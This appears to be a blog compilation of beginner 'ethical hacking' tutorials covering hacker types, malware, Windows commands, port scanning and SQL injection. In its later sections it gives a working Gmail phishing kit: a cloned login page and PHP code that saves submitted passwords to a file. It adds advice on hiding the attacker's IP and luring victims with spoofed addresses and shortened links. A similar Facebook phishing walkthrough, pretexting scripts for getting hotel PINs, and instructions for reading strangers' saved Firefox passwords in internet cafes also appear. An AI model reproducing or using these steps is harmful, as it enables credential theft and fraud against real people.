Introduction to Hacking.
What is computer hacking?
In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking.
Now a days, People started think that hacking is only hijacking Facebook accounts or defacing websites. Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking.
So what is exactly hacking, what should i do to become a hacker?! Don't worry, you will learn it from Break The Security. The main thing you need to become a hacker is self-interest. You should always ready to learn something and learn to create something new.
Now , let me explain about different kind of hackers in the cyber security world.
Script Kiddie
Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers. In a simple word, the one who doesn't know how a system works but still able to exploit it with previously available tools.White Hat Hacker:
White Hat hackers are good guys who does the hacking for defensing. The main aim of a Whitehat hacker is to improve the security of a system by finding security flaws and fixing it. They work for an organization or individually to make the cyber space more secure.
Break The Security only concentrates on white-hat hacking and help you to learn the EthicalHacking world.
Black Hat Hacker:
BlackHat hackers are bad guys , cyber criminals , who have malicious intent. The hackers who steal money, infect systems with malware ,etc are referred as BlackHat hackers. They use their hacking skills for illegal purposes.
GreyHat hackers:
The hackers who may work offensively or defensively, depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.
Hacktivists
The hackers who use their hacking skills for protesting against injustice and attack a target system and websites to bring the justice. One of the popular hacktivists is Anonymous.
How to Become a Penetration Tester/Ethical Hacker//Security Professional?
I have been asked for tips to become Ethical Hacker or Penetration tester via email. So In this article, i am going to guide you to get into the Penetration Testing world.
If you are seeing this article, then it means that you already heard about Ethical Hacking and PenTesting. Anyway, i just like to give small definition about Ethical hacking.
What is Ethical Hacking and Ethical Hacker?
Ethical Hacking, also known as Penetration testing, is the process of vulnerability testing or hacking the system with a permission from corresponding vendor. Normally, organization who are in the need of security recruits Ethical Hacker or PenTester for improving their security.
Ok, let us come to the article.
How to Become an Ethical Hacker?
- Dedication : Dedication is the main key to become an ethical hacker. Don't plan to become pentester because of money. If you really have interest, then go ahead.
- Reading : Be a bookworm. Try to read books related to computer and its architecture. Buy books related to Security and Ethical hacking.
- Know how hackers hack into: You can not solve the problem until you know what is behind the problem. So you have to learn method of hackers. How ??! Just read the articles provided in our site.
- Programming and Scripting: Learn Some programming or scripting languages because most of time you will need to write a code to break into a system. Also, you have to know the coding for understanding how a system works,then only you can penetrate into. Ok, which language?! My suggestion is C. I Love C programming. It is one of best,powerful language and easy to learn. Some peoples prefer python. As far as i am concerned, once you learned one language, it is easy for you to learn any other languages. There are are plenty of online programming tutorial sites are out there.
- Linux: Ok, it is time to switch from Windows to Linux. Learn to work with Linux.
- BackTrack Linux Distribution: Backtrack Linux is one of the famous Penetration Testing Linux distribution. This backtrack is funded by Offensive Security. It has almost all penetration testing tools required for security professionals.
- Get Certification for Ethical Hackers: Some organization recruits based on security certification. You can learn and get ethical certification from your nearest center. Search in google for these keywords "CEH","OSCP","security certifications". Anyway, if you have dedication and confidence, you don't need a certificate and get into a firm easily.
- BreakTheSecurity: In BreakTheSecurity , i have written plenty of articles related to Ethical hacking and penetration testing. Hope it will help you to get some knowledge. Also, you can find the latest ethical hacking techniques here.
- Forums: Participate in any Security or ethical Hacking related forums.
- Need help?! feel free to contact me
There are plenty of jobs available in government organizations, banks, financial institutions, military establishments and private companies. India requires more Ethical Hackers.
What is Social Engineering?
Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim."Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.
In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.
The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker.
Some Examples
Example 1: You receive an e-mail where the sender and the manager or someone on behalf of the support department of your bank.
In the message he says that the Internet Banking service is presenting a problem and that this problem can be corrected if you run the application attached to this message.
The implementation of this application presents a screen similar the one you use to access bank account, waiting for you to type your password. In fact, this application is prepared to steal your password to access the bank account and sends it to the attacker
Example 2: You receive an e-mail saying that your computer is infected by a virus. The message suggests that you install a tool available on an Internet site, to eliminate the virus from your computer.
The real function of this tool and does not eliminate a virus, but I give someone access to your computer and all data stored on it.
Example 3: a stranger calls your house and says it is the technical support of your ISP.
In this connection he says that his connection to the Internet is presenting a problem and then, ask your password to fix it. If you give your password, this so-called technical can perform a multitude of malicious activities, using your access account
Internet and therefore such activities relating to its name.
Practical Examples:
Retail Paging Systems---------------------
Wal-Mart store phones have clearly marked buttons for the paging system. Wal-Mart is
the exception, not the rule. So how do you get on the paging system to have a little
fun when you're bored out of your mind shopping with your girlfriend? Social
engineering, my whipped friend. Find a phone and dial an extension, preferably the
store op. The key here is to become a harried employee, saying something similar
to..."This is Bill in shoes. What's the paging extension?" More often than not,
you'll get the extension without another word. Now, get some by saying something
sweet over the intercom.
Airport White Courtesy Phones
-----------------------------
Imagine you've already been stripped searched and you're waiting for your delayed
flight. Naturally, you gravitate to a phone. Is it white? Then you've got a free
call right in front of you. Just pick up to get the op. "This is Bill at Southwest,
Gate A5. We're swamped and our phones are tied. Can I get an outside line?" If
the phone does not have DTMF, or the op wants to dial the call for you, do not call
a number related to you.
Hotels
------
Hotels hold such promise. Some hotels have voice mail for each room, guests
receiving a PIN when they check in. Hotels also have "guest" phones; phones outside
of rooms that connect only to rooms or the front desk. Pick up a guest phone, make
like a friendly guest and say, "I forgot my PIN. Could I get it again? Room XXX."
Knowing the registered name of the target room helps, for the Hotel and Restaurant
Management Degree Program graduate may ask for it.
Do not follow through with the next social engineering example. Or, like the author,
try it on a friend. Go to the front desk and tell the attendant that you've locked
your key (card) in the laundromat, in your room, lost it, etc. Do not try this with
the attendant that checked you in. And again, do not enter someone's room without
permission.
Calling Technical Support
-------------------------
So you've found a new-fangled computerized phone and you want to learn more about it.
Do the same thing you do when you have trouble with your AOL - call tech support.
First, do a little planning (after getting the tech support number off of the phone
or the web). Get some info on the phone, like phone number, model number, other
identifying numbers, etc. Also, know the name of the facility in which the phone is
located. Now that you've got some ammo, you're ready to make the call. Posing as an
employee of the facility, call tech support and make up a problem for the phone
you've identified. Act a little dumb and be apologetic, acting like you don't want
to waste their time. All the while, pumping them for information - "I hate to bug
you for this, but <insert problem here>." <You'll get some info from tech support
here.> <Build on what you've learned and curiously ask another question.> And so
on until you reach the point where you can feel that it's time to end the call.
Occasionally acting amazed at their knowledge may be helpful.
Methods of Social Engineering
Phishing
Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business — a bank, or credit card company — requesting "verification" of information and warning of some dire consequence if it is not provided. The e-mail usually contains a link to a fraudulent web page that seems legitimate — with company logos and content — and has a form requesting everything from a home address to an ATM card's PIN.
For example, 2003 saw the proliferation of a phishing scam in which users received e-mails supposedly from eBay claiming that the user's account was about to be suspended unless a link provided was clicked to update a credit card (information that the genuine eBay already had). Because it is relatively simple to make a Web site resemble a legitimate organization's site by mimicking the HTML code, the scam counted on people being tricked into thinking they were being contacted by eBay and subsequently, were going to eBay's site to update their account information. By spamming large groups of people, the "phisher" counted on the e-mail being read by a percentage of people who already had listed credit card numberswith eBay legitimately, who might respond.
Vishing or Phone Phishing:
This technique uses an Interactive Voice Response (IVR) system to recreate a legit sounding copy of a bank or other institution's IVR system. The slave is prompted to call in to the "bank" via a phone number provided in order to "verify" information.
Baiting
Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the slave. In this attack, the attacker leaves a malware infected floppy disc, CD ROM, or USB flash drive in a location sure to be found, gives it a legitimate looking and curiosity-piquing label, and simply waits for the slave to use the device.
What is Malware?:
Malware is a malicious software. This software include the program that exploit the vulnerabilities in computing system. The purpose of malicious software is harm you or steal the information from you.Types of Malicious Softwares:
There are three characteristics of malwares:
1 Self-replicating malware actively attempts to propagate by creating new
copies, or instances, of itself. Malware may also be propagated passively,
by a user copying it accidentally, for example, but this isn't self-replication.
2 The population growth of malware describes the overall change in the number
of malware instances due to self-replication. Malware that doesn't selfreplicate
will always have a zero population growth, but malware with a
zero population growth may self-replicate.
3 Parasitic malware requires some other executable code in order to exist.
"Executable" in this context should be taken very broadly to include anything
that can be executed, such as boot block code on a disk, binary code
Trojan Horse:
The most famous malicious software is Trojan Horse.
There was no love lost between the Greeks and the Trojans. The Greeks had
besieged the Trojans, holed up in the city of Troy, for ten years. They finally
took the city by using a clever ploy: the Greeks built an enormous wooden horse,
concealing soldiers inside, and tricked the Trojans into bringing the horse into
Troy. When night fell, the soldiers exited the horse and much unpleasantness
ensued.
In computing, a Trojan horse is a program which purports to do some benign
task, but secretly performs some additional malicious task. A classic example is
a password-grabbing login program which prints authentic-looking "username"
and "password" prompts, and waits for a user to type in the information. When
this happens, the password grabber stashes the information away for its creator,
then prints out an "invalid password" message before running the real login
program. The unsuspecting user thinks they made a typing mistake and reenters
the information, none the wiser.
Logic Bomb:
Self-replicating: no
Population growth: zero
Parasitic: possibly
The oldest type of malicious software. This program is embedded with some other program. When certain condition meets, the logic bomb will destroy your pc.
It also crash at particular date which is fixed by attacer. It will be included in legitimate orauthorized person like this:
Eg:
if some antivirus trying to delete or clean the logic bomb. The logic bomb will destroy the pc.
Back Door or Trap Door:
Self-replicating: no
Population growth: zero
Parasitic: possibly
A back door is any mechanism which bypasses a normal security check. Programmers
sometimes create back doors for legitimate reasons, such as skipping
a time-consuming authentication process when debugging a network server.
As with logic bombs, back doors can be placed into legitimate code or be
standalone programs.
One special kind of back door is a RAT, which stands for Remote Administration
Tool or Remote Access Trojan, depending on who's asked. These programs
allow a computer to be monitored and controlled remotely;
Virus:
Self-replicating: yes
Population growth: positive
Parasitic: yes
A virus is malware that, when executed, tries to replicate itself into other executable
code; when it succeeds, the code is said to be infected. The infected
code, when run, can infect new code in turn. This self-replication into existing
executable code is the key defining characteristic of a virus.
Types of Virus
1.Parasitic virus:
Traditional and common virus. This will be attached with EXE files and search for other EXE file to infect them.
2. Memory Resident Virus:
Present in your system memory as a system program. From here onwards it will infects all program that executes.
3. Boot Sector Virus:
Infects the boot record and spread when the system is booted from the disk containing the virus.
4. Stealth Virus:
This virus hides itself from detection of antivirus scanning.
Worm:
Self-replicating: yes
Population growth: positive
Parasitic: no
A worm shares several characteristics with a virus. The most important characteristic
is that worms are self-replicating too, but self-replication of a worm
is distinct in two ways. First, worms are standalone, and do not rely on other
executable code. Second, worms spread from machine to machine across networks.
Rabbit:
Self-replicating: yes
Population growth: zero
Parasitic: no
Rabbit is the term used to describe malware that multiplies rapidly. Rabbits
may also be called bacteria, for largely the same reason.
There are actually two kinds of rabbit.The first is a program which tries
to consume all of some system resource, like disk space. A "fork bomb," a
program which creates new processes in an infinite loop, is a classic example
of this kind of rabbit. These tend to leave painfully obvious trails pointing to
the perpetrator, and are not of particular interest.
The second kind of rabbit, which the characteristics above describe, is a
special case of a worm. This kind of rabbit is a standalone program which
replicates itself across a network from machine to machine, but deletes the
original copy of itself after replication. In other words, there is only one copy
of a given rabbit on a network; it just hops from one computer to another.
Rabbits are rarely seen in practice.
Spyware:
Spyware is software which collects information from a computer and transmits
it to someone else.
The exact information spyware gathers may vary, but can include anything
which potentially has value:
1 Usernames and passwords. These might be harvested from files on the
machine, or by recording what the user types using a key logger. A keylogger
differs from a Trojan horse in that a keylogger passively captures keystrokes
only; no active deception is involved.
2 Email addresses, which would have value to a spammer.
3 Bank account and credit card numbers.
4 Software license keys, to facilitate software pirating.
Definitions
Adware:
Self-replicating: no
Population growth: zero
Parasitic: no
Adware has similarities to spyware in that both are gathering information about
the user and their habits. Adware is more marketing-focused, and may pop up
advertisements or redirect a user's web browser to certain web sites in the hopes
of making a sale. Some adware will attempt to target the advertisement to fit
the context of what the user is doing. For example, a search for "Calgary" may
result in an unsolicited pop-up advertisement for "books about Calgary."
Adware may also gather and transmit information about users which can be
used for marketing purposes. As with spyware, adware does not self-replicate.
Zombies:
Computers that have been compromised can be used by an attacker for a
variety of tasks, unbeknownst to the legitimate owner; computers used in this
way are called zombies. The most common tasks for zombies are sending spam
and participating in coordinated, large-scale denial-of-service attacks.
Signs that your system is Infected by Malware:
Top 10 Important command prompt's commands
1. ipconfig :
This is the top most command for seeing the ip address,subnet mask and default gateway also includes display and flush DNS cache, re-register the system name in DNS.. This will most useful tool for viewing and troubleshooting TCP/IP problem.
- To view ip ,subnet mask address : ipconfig
- To view all TCP/IP information, use: ipconfig /all
- To view the local DNS cache, use: ipconfig /displaydns
- To delete the contents in the local DNS cache, use: ipconfig /flushdns
2.systeminfo
Have a need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. When I need to connect to a system that I am not familiar with, this is the first tool I run. The output of this command gives me all the info I need including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory). Also knowing what hot fixes are installed can be a big help when troubleshooting problems. This tool can be used to connect to a machine remotely using the following syntax: SYSTEMINFO /S system /U user
3. tasklist and taskkill
If you work with Task Manager (ctrl+alt+del) ,you can easily understand this. Task list is list of task which are running on windows currently. If you open any application,it will be added to task.
To List the Tasks type in cmd as :
This will show the list of task which are running as shown in the picture
To stop the Process or task ,there is two methods :
Using Image Name:
We can kill the task using its Image Name as follows:
Using Process Id:
we can stop the process using its process id as follows :
4. type
type is used to read the text document in command prompt . You can read multiple text in continuously
5.netstat
Need to know who (or what) is making a connection to your computer? Then netstat is the tool you want to run. The output provides valuable information of all connections and listening ports, including the executable used in the connections. In additon to the above info, you can view Ethernet statistics, and resolve connecting host IP Addresses to a fully qualified domain name. I usually run the netstat command using the -a (displays all connection info), -n (sorts in numerical form) and -b (displays executable name) switches.
6.net command
Although this tool is more known as a command, the net command is really like a power drill with different bits and is used to update, fix, or view the network or network settings.
It is mostly used for viewing (only services that are started), stopping and starting services:
- net stop server
- net start server
- net start (display running services)
- net use m: \\myserver\sharename
- net use m: \\myserver\sharename /delete
Below are all the options that can be used with the net command.
7 - nslookup - With the Internet, DNS (Domain Name Service) is the key for allowing us to use friendly names when surfing the web instead of needing to remember IP Addresses. But when there are problems, nslookup can be a valuable tool for testing and troubleshootingDNS servers.
Nslookup can be run in two modes: interactive and noninteractive. Noninteractive mode is useful when only a single piece of data needs to be returned. For example, to resolve google.com:
To use the interactive mode, just type nslookup at the prompt. To see all available options, type help while in interactive mode.
Don't let the help results intimidate you. Nslookup is easy to use. Some of the options I use when troubleshooting are:
set ds (displays detailed debugging information of behind the scenes communication when resolving an host or IP Address).
set domain (sets the default domain to use when resolving, so you don't need to type the fully qualified name each time).
set type (sets the query record type that will be returned, such as A, MX, NS)
server NAME (allows you to point nslookup to use other DNS servers than what is configured on your computer)
To exit out of interactive mode, type exit .
8 - ping and tracert - These tools can be helpful with connectivity to other systems. Ping will test whether a particular host is reachable across an IP network, while tracert (traceroute) is used to determine the route taken by packets across an IP network.
To ping a system just type at the prompt: ping www.google.com. By default, ping will send three ICMP request to the host and listen for ICMP “echo response” replies. Ping also includes switches to control the number of echo requests to send (-n ), and to resolve IP addresses to hostname (-a ).
To use tracert, type at the prompt: tracert www.google.com. You can force tracert to not resolve address to hostnames by using the -d switch, or set the desired timeout (milliseconds) for each reply using -w switch.
9 - gpresult - Used mostly in environments that implement group poicies, gpresults (Group Policy Results) verifies all policy settings in effect for a specific user or computer. The command is simple to use, just enter gpresults at the prompt. It can also be used to connect to computers remotely using the /S and /U switches.
10 - netsh - Without a doubt the most powerful command line tool available in Windows. Netsh is like the swiss army knife for configuring and monitoring Windows computers from the command prompt. It capabilities include:
- Configure interfaces
- Configure routing protocols
- Configure filters
- Configure routes
- Configure remote access behavior for Windows-based remote access routers that are running the Routing and Remote Access Server (RRAS) Service
- Display the configuration of a currently running router on any computer
- Enable or disable Windows firewall:
- Enable or disable ICMP Echo Request (for pinging) in Windows firewall:
- Configure your NIC to automatically obtain an IP address from a DHCP server:
As you can see netsh can do alot. Instead of re-inventing the wheel, check out the followingMicrosoft article for more info on netsh.
Different types of Email Account Hacking
The Basic level Hacking is Email Account Hacking. Everyone like to do first email account hacking only. So here is the tutorial for budding hackers about email Hacking.
There are different types of Email Account Hacking . Here is some of them :
- Social Engineering
- Phishing
- Brute Force Attack
- Keylogger
- Guessing the Answer for the Security Question
Social engineering takes advantage of the weakest link in any organization’s
information security defenses: people. Social engineering is
“people hacking” and involves maliciously exploiting the trusting nature of
human beings to obtain information that can be used for personal gain.
Social engineering is one of the toughest hacks to perpetrate because it takes
great skill to come across as trustworthy to a stranger. It’s also by far the
toughest hack to protect against because people are involved.
Social Engineering is different from Physical Security exploits . In social engineering hackers will analyze about
victim. Hackers will send mail to victim. The contents will be related to the victim.
Eg:
✓ False support personnel claim that they need to install a patch or new
version of software on a user’s computer, talk the user into downloading
the software, and obtain remote control of the system.
✓ False vendors claim to need to update the organization’s accounting
package or phone system, ask for the administrator password, and
obtain full access.
✓ Phishing e-mails sent by external attackers gather user IDs and passwords
of unsuspecting recipients. Hackers then use those passwords to
gain access to bank accounts and more. A related attack exploits crosssite
scripting on Web forms.
✓ False employees notify the security desk that they have lost their keys
to the computer room, receive a set of keys from security, and obtain
unauthorized access to physical and electronic information.
Phishing WebPage:
It is a fake webpage which looks similar to the original page of the website. Using this WebPage we can easily get the Password of victims. The process involved in creating Phishing webpage are,
✓ First Visit the Website which is associated with the email id. Copy the Source code.
✓ Edit the the Source code such that it will store the password for you.
✓ Upload the Webpage to any free webhosting sites. (don't select a famous hosting site,they will find that
your page is fake). Try uploading through the proxy server.
Guessing the Answer for Security Question:
Do you remember that the mail sites will ask for the security questions to retrieve the mail account? You can hack the mail account simply guessing the answer. If the victim is your friend ,then it may very easy to hack.
Brute Force Attack:
A famous and traditional attacking method . In this method ,the password will be found by trying all possible passwords with any program or software.
Keyloggers:
It is one of the spyware which will capture what you type in the keyboard. so whenever you type the username and password ,it will simply capture.
It is software program which will be attached with any softwares and send to victim. While victim install the software ,the keylogger also start to work. Keyloggers are exe files.
How to see saved password in Mozilla Firefox
Here is simple hacking tutorial to view the saved passwords in Mozilla firefox.
While visiting public internet cafe ,some innocent peoples click the "Remember" while mozilla asking for remembering. This is one of the benefit for us to hack their account in very simple way.
Follow these steps to see the saved Passwords:
- click the "Tools" menu in menu bar.
- Select Options
- It will open a small window
- Select the "security" tab in that small window
- You can view "saved Passwords" button
- Click that button.
- It will another small window
- There will be list of sites with usernames
- Select One site and click the "show Password"
- It will clearly show you the password
Access blocked website in college or school or net center-Proxy Server
In your college or school they restrict to see some sites ? You can access without any restrictions using the proxy server.
What is Proxy?
Proxy server is some kind of a buffer between your computer and the designated internet destination. When you use a proxy server , your computer will send a request to the proxy server , then the proxy server will send it to the destination (for example a website), the destination will answer the request the proxy has sent and finally the proxy will return the data to you computer.
Reasons for using proxy servers:
- Proxy server is able to increase or decrease the speed of your connection to the Internet depending on the location of the proxy
- Proxy server ( but only anonymous) can hide your IP address (the resource you visit will retrieve the IP of the proxy, and not your
- Proxy servers can help in case some owner of an Internet resource impose restrictions for users from certain countries ( for example hulu.com is only reserved for those from United States, if you are not from United States, you can’t watch videos on hulu.com)
open the proxy server site .
when you open the browser it will ask you to get the certificate.
so click "Get certificate "
and click "ok"
Now site will be opened
The website will ask you to enter the url of site.
enter url of site you want to visit .
List of Proxy Sites:
Pricacywanted.info
Netrover.info
Hidemyass.com
Launchwebs.org
Clear5.info
Bingbot.info
Calculatepie.com
Unicornpipe.com
truckflood.com
fly proxy
Fire-proxy
What is Port Scanner? what is the use?
In my last post i gave you the list of best port scanner tools. In this post i will explain about port scanning process and use of port scanning.
Port Scanning:
Port scanning is the process of searching for active or opened ports in victim system. Just like a thief searching for gate opened house. Consider this scanning
Starting Scan.
Target Host: www.yourcompany.com or IP Address
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.
It shows the active ports in that domain or ip address
What is the Use?
what we can do with these ports? we can communicate with the victim system remotely using those active ports. So we can get their data without their knowledge.(The thing is that you can theft their data).
Scanning for open ports is done in two ways.
- Scan a single IP address for open ports:
It just like a thief who searching for any opened gate in single house.
In relation to scanning, the gate is port and house is IP address.
We are searching for the active port in a single IP address
Eg:
searching for active ports only at 123.xx.xx.xx - Scan a range of IP address to find open ports:
Scanning a range of IP address is like thief who searching for any opened gate in a street. In relation to scanning, the gate is ports and street is range of ip address
Eg:
searching active ports only at
123.20.xx.xx to 123.30.xx.xx
What is Database and MY SQL Injections
In this i'll give you intro to the SQL Injections. Next post will give you detailed information about the SQL injections.
What is the Database?
Datbase is an application that stores a collection of Data.Database offers various APIs for creating, accessing and managing the data it holds. And database(DB) servers can be integrated with our web development so that we can pick up the things we want from the database without much difficulties.
Database is a place that stores username,passwords and more details. Database should be secured. But providing high level security is not possible for all sites(much costlier or poor programming ). So Database of many websites is insecure or vulnerable(easily hackable).
Some List of Database are:
- DB servers,
- MySQL(Open source),
- MSSQL,
- MS-ACCESS,
- Oracle,
- Postgre SQL(open source),
- SQLite,
SQL injection is Common and famous method of hacking at present . Using this methodan unauthorized person can access the database of the website. Attacker can get all details from the Database.
What an attacker can do?
- ByPassing Logins
- Accessing secret data
- Modifying contents of website
- Shutting down the My SQL server
A small Introduction about Batch Programming for Hackers
What is Batch file?
Batch files are a list of command line instructions that are "batched" together in one file. Most of the command lines can be executed within the command prompt, but batch files make the work load much easier. Batch files can be opened, copied, and edited using notepad.
They are used for simple routines and low-level machine instruction. On Windows, many batch files can be seen within the c:\Windows directory.
Batch files, more or less, make up the backbone of the Windows Operating System. The operating system must have access to these files and be able to add and delete instructions from them. Delete them, and you have effectively disabled the OS.
Basic Batch File Utilities and Commands
Note: Any DOS command can be used within a batch file, below are a list of commands used to support the structure and flow of the batch file
@
Place @ in front of commands that you don't want echoed within the process.
CLS
Clears the screen of any previous data.
CALL
Calls another batch file. Once other batch file isfinished, control is returned to the first (i.e. CALL c:\Windows\Newbat.bat).
BREAK ON/OFF
When turned on within the batch file, the user has an option of stopping the batch file by bressing Ctrl+Break.
GOTO - This command is used to go to another section of the batch file. Sections can be added by adding a colon infront of a name
(i.e. :FIRSTSECTION, :SECONDSECTION):
It is possible to loop with the GOTO command:
PAUSE
The pause command halts a proccess until a key is hit by the user. Displays the message, "Press any key to continue..."
REM
Allows a remark to be placed within the code, displaying a message to the user (i.e. REM HELLO!).
ECHO ON
Command process is shown to user; @ is usually placed before (@ECHO ON).
ECHO OFF
Command process is not shown to the user; @ is usually placed before (@ECHO OFF).
end
Ends the process.
Simple Batch Programming to show Hello message is :
@echo off
echo "hello world"
echo "hello world"
Type this code into notepad and save it with .bat extenstion(For eg: hello.bat)
By double clicking the batch file,you can run the file. Above batch file will show the hello world but we can' see it. because the window will open and closed within a second.
We will see later how to see it.
How to create fake or Phishing web page for gmail
This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.
Steps for Creating Phishing or Fake web Page:
Step 1:
Go to the gmail.com. Save the Page as "complet HTML" file
Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"
Step3:
Upload those image to tinypic or photobucker.com. copy the url of each image.
Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .
Step 5:
Search for the
action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php"
save the file.
Step6:
Now you need to create login.php
so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save itheader("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of
SUBDOMAIN WEB HOSTING SITE.
NOTE: THAT WEB HOSTING SERVICE MUST HAS PHP FEATURE.
USE ONE OF THESE SITES:110MB.COM, SPAM.COM JUSTFREE.COM OR 007SITES.COM.
USE THIS SITES THROUGH THE SECURE CONNECTION SITES(SO THAT YOU CAN HIDE YOUR IP ADDRESS) LIKE: HTTP://FLYPROXY.COM . FIND BEST SECURE CONNECTION SITE.
STEP 8:
CREATE AN EMAIL WITH GMAIL KEYWORD.
LIKE : GMAILBURGER@GMAIL.COM
STEP 9:
SEND TO VICTIM SIMILAR TO " GMAIL STARTS NEW FEATURE TO USE THIS SERVICE LOG IN TO THIS PAGE"FROM THAT GMAIL ID WITH LINK TO YOUR PHISHING WEB PAGE.
NOTE:
FOR USER TO BELIEVE CHANGE YOUR PHISHING WEB PAGE URL WITH ANY OF FREE SHORT URL SITES.
LIKE : CO.NR, CO.CC,CZ.CC
THIS WILL MAKE USERS TO BELIEVE THAT IT IS CORRECT URL.
How to Hack Facebook Account Using Phising web Page
BTS' readers used to ask me how to hack Facebook accounts. Most of the people curious to know how hackers take control of their accounts. In this post, let me clarify those doubts.
Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing" .
Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.
Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.
Let me explain how to create a facebook phishing page.
Step 1:
Go to facebook and right click on website . Select "View source" and copy the code to notepad.
Step2:
Now search (Press ctrl +f) for keyword "action" in that code.
You fill find the code like this:
Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that. 'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.
In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php). So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .
To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '. Note: I've removed ' http://login.facebook.com/' from the value.
Save the file as index.html.
Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.
Open the notepad and type the following code:
save this file as "login.php"
Step 4:
Open the notepad and just save the file as "pswrds.txt" (without any contents).Step 5:
To host your phishing page, you may need a webhosting. You can create a free account infree web hosting providers. Once you have created account in free hosting site, you can host your files and run. Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.
Now upload those files(index.html,login.php,pswrds.txt) in the free WEB HOSTING SITE. MAKE SURE YOUR FAKE PAGE IS WORKING OR NOT BY VISING YOUR URL.
Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.
Note:
The above article is for educational purpose only, written for beginners of Ethical hacking to understand the basics. Here is tips to prevent from Phishing Web page:
MORE TUTORIALS COMING SOON
0 comments:
Post a Comment